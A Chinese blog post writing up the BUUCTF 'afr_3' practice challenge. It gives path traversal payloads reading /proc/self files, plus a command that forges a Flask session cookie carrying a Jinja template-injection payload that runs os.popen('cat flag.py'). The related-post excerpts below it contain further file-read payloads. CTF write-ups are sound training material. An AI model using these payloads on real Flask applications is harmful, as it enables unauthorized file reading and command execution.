BUUCTF afr_31

最新推荐文章于 2024-08-24 22:16:54 发布
最新推荐文章于 2024-08-24 22:16:54 发布
阅读量380 收藏 9
点赞数 5
分类专栏: BUUCTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74167420/article/details/137783288
版权

(一)BUUCTF web afr_3 考察linux中/proc/目录的理解,以及flash模板注入

(1)name=../../../../../proc/self/cmdline
(2)name=../../../../../proc/self/cwd/server.py  (最后的py文件可以改变)

(二)BUUCTF afr_3 使用的是文件路径穿越漏洞,可以通过以上两行代码,查询到flag文件,
使用python3 ./flask_session_cookie_manager3.py encode -s "Drmhze6EPcv0fN_81Bj-nA" -t "{'n1code': '{{''.class.mro[2].subclasses()[71].init.globals['os'].popen('cat flag.py').read()}}'}" 进行伪造。
这个命令看起来是在使用 Flask Session Cookie Manager 工具来对会话数据进行编码。具体来说,它执行了以下操作:

1、使用 flask_session_cookie_manager3.py 脚本。
2、使用 encode 子命令表示要对会话数据进行编码。
3、使用 -s 选项指定会话密钥,这里是 "Drmhze6EPcv0fN_81Bj-nA"。
4、使用 -t 选项指定要编码的会话数据,这里是一个 Python 字典作为字符串,其中包含了一个键值对,键为 "n1code",值为一个特定的 Python 表达式。
5、这个 Python 表达式的目的是读取名为 flag.py 的文件的内容,并将其作为字符串返回。具体来说,它使用了 Python 中的一些特性,包括 .__class__.__mro__ 来获取类的方法解析顺序(Method Resolution Order, MRO)、__subclasses__() 来获取所有子类、__init__.__globals__ 来获取全局变量等。
6、这个命令看起来是在尝试利用 Python 的一些特性来读取 flag.py 文件的内容,并将其嵌入到会话数据中,以便在应用程序中进行处理或者传输。

(三)命令在kali中进行以下操作:

得到

.eJwdikEKgCAQAL8SXlYvQl2CviKxbGoRmCtZhxD_nnUbZqaI2Ft2XkyiFACNaAPljNjoOBnRDHPDfC-_961IZcb-k3vcr3_cAi8UWjLAGWadOPkowdLVrYE2nR5Q-vTkpKpV1BcrHygP.Zh9zPA.wjAKLeMY50OWw1VaBKLq5IY8v7Y

(四)在bp进行拦截,对session进行修改。

得到flag。

爱隐身的官人
关注
  • 5
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Buuctf-01
Usashi的博客
10-27 1302
Basic Linux Labs 参考链接 ssh -p 28309 root@node4.buuoj.cn -p指定端口,root为用户名,@后为ip地址 第一次连接需要输入yes ls ../ cat ../flag.txt flag{2a02935d-b864-48c0-850c-f8f4ef1e11cd} BUU LFI COURSE 1 <?php /** * Created by PhpStorm. * User: jinzhao * Date:.
BUUCTF
Q221022的博客
02-12 1239
1.old-fashion 直接用quiqiup解密即可得到flag 2.世上无难事 看到答案是32位,我就想到了MD5,然后用MD5解密,不对,不是MD5,所以就用quipqiup试试,key就出来了 3.RSA3 题上有两组c和e,只有一个n,(所以猜测这两组应该用的是同一个n)将n分解成p和q(不知道为什么,我用了三个网站都没分解出来,是因为数字太大吗?)然后,就可以求出私钥d,进而解密出m ,得到答案 4.RSA2 dp=d mod (p-1) 我认为..
BUUCTF[第一章 web入门]afr_2
hivjianxian的博客
11-22 831
ctf题解
BUUCTF[第一章 web入门]afr_1
hivjianxian的博客
11-22 542
ctf题解
BUUCTF [第一章 web入门]afr_1
woshicainiao666的博客
08-21 284
题目告诉我们是任意文件读取,看到?p=hello 我们将hello换成flag,得到下图。我们想到利用php伪协议看源代码有没有隐藏信息。将源代码以base64的形式输出。然后解码得到flag。
《从0到1:CTFer成长之路》配套题目第一章afr_3
Youth____的博客
12-14 2329
afr_3 这题跟着wp做的,让人头秃 本题考查对linux系统中/proc/目录下文件作用的了解,同时考查了flask模板注入 关于/proc/目录 Linux系统上的/proc目录是一种文件系统,即proc文件系统。与其它常见的文件系统不同的是,/proc是一种伪文件系统(也即虚拟文件系统),存储的是当前内核运行状态的一系列特殊文件,用户可以通过这些文件查看有关系统硬件及当前正在运行进程的信息,甚至可以通过更改其中某些文件来改变内核的运行状态。 /proc/[pid],当查看当前进程的时候可以用/pro
CTF刷题记录Buuctf_N1BOOK——afr_3
m_de_g的博客
06-17 1794
** N1BOOK——afr_3 ** 一、解题思路 1.打开题目发现一个输入框 既然是web题的话,还是先查看页面源代码 就发现使用的是POST的提交方式,没办法,只能看这个框的秘密所在了 2.直接输入1进行查询 页面提示说,你为什么不看我们的文章呢?这里是个出发的按钮,点击 3.又有提示说明,这是一篇示例文章?内心充满了困惑?????? 抬头一看,URL好奇怪 http://80a3f61d-704d-4c38-b615-158bab104673.node3.buuoj.cn/article?
《从0到1:CTFer成长之路》书籍配套题目--afr_3 BUUCTF
wuyaowangchuan的博客
11-19 2736
还是任意文件读取漏洞 进入坏境 点入链接 这边可以读取文件 试一试article?name=/etc/passwd 读不到flag 找找WP /proc/sched_debug # 提供cpu上正在运行的进程信息,可以获得进程的pid号,可以配合后面需要pid的利用 /proc/mounts # 挂载的文件系统列表 /proc/net/arp # arp表,可以获得内网其他机器的地址 /proc/net/route # 路由表信息 /proc/net/tcp and /proc/net/udp .
BUUCTF [第一章 web入门]afr_2 WP
m0_74788977的博客
01-24 375
查看网站源码,发现图片img的路径,由题目描述可知,这是一个任意文件读取漏洞。使用../返回到当前目录的上层目录。打开imf.gif所在的目录。
C#人脸识别+虹软AFR_FSDK_Demo_仅供项目实战学习
07-10
使用到的虹软的SDK包中,...AFR_FSDK_FaceInput public struct AFR_FSDK_FaceInput { public MRECT rcFace; public int lOrient; } 这个结构体是FD识别的输出结构体,我们在上一章节标记人脸时使用了此结构体。
AFR.zip_RP Java_afr 48a_cad java_java cad_them
09-19
A system that takes CAD drawings as input and apply automatic feature recognition methods on them to identify different features present in them. The feature will then populate in a tree in the system...
HA_AFR20_gnatix
03-04
快速查找工具HA_AFR20_gnatix
AFR_FSDK_FACEMODEL
11-10
AFR_FSDK_FACEMODEL是虹软人脸识别SDK中的一个结构体,用于存储人脸特征数据。该结构体包含两个成员变量:pbFeatur和FeaturSiz。其中,pbFeatur是一个指向人脸特征数据的指针,FeaturSiz是人脸特征数据的长度。通过...
0到1 ctfer :afr_2 :Nginx目录穿越漏洞
Zeker62的博客
08-31 713
参考:https://www.cnblogs.com/yuzly/p/11212078.html Nginx匹配到路径files后,把后面的内容加到/home/的后面,就成了/home/../ 防御方法就是: 在/files后面加/,形成/files/,这样URL访问/files../,home后面就是有两个/,形成/home//../ 或者在home后面加/也可以 打开靶场: 观察到一个目录,...
《从0到1:CTFer成长之路》--afr_2 BUUCTF
wuyaowangchuan的博客
11-18 2354
依旧是任意文件读取漏洞 进入环境 查看页面源代码 访问一下这个目录 看到…/就想到目录穿越 n1book{afr_2_solved}
BUUCTF】N1BOOK WEB WP
aoao331198的博客
03-29 2241
文章目录常见的搜集粗心的小李SQL注入-1SQL注入-2afr_1afr_2 常见的搜集 粗心的小李 git泄露,用scrabble工具得到一个网页打开即可 SQL注入-1 SQL注入-2 afr_1 afr_2
BUUCTF-N1BOOK-Web-afr_1 and afr_2
m0_47154926的博客
10-10 1772
根据题目 任意文件读取漏洞 发现参数p p=hello直接 p=flag 利用php://filter构造本题payload php://filter/convert.base64-encode/resource=flag 得到base64编码,进行解码 得到flag n1book{afr_1_solved} 查看网页源代码 发现img.gif在文件夹img里,访问img 发现…/ 想到目录穿越 参考:目录穿越 直接访问 下载,得到flag ...
第135天:内网安全-横向移动&非约束委派&约束委派&数据库攻防
最新发布
weixin_71529930的博客
08-24 495
非约束委派存在不安全性,所以微软在Windows server 2003中引入了约束委派,约束委派攻击主要利用被控主机设置了域控的CIFS服务的约束委派,则攻击者可以先使用S4u2seflt申请域管用户访问被控主机的ST1,然后使用S4u2Proxy以administrator身份访问域控的CIFS服务,即相当于控制了域控。攻击者拿到了一台配置非约束委派的机器权限,可以诱导域管来访问该机器,然后得到管。利用该身份就可以访问域控,记得用主机名去访问。(域控)访问具有非约束委派权限的机器。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值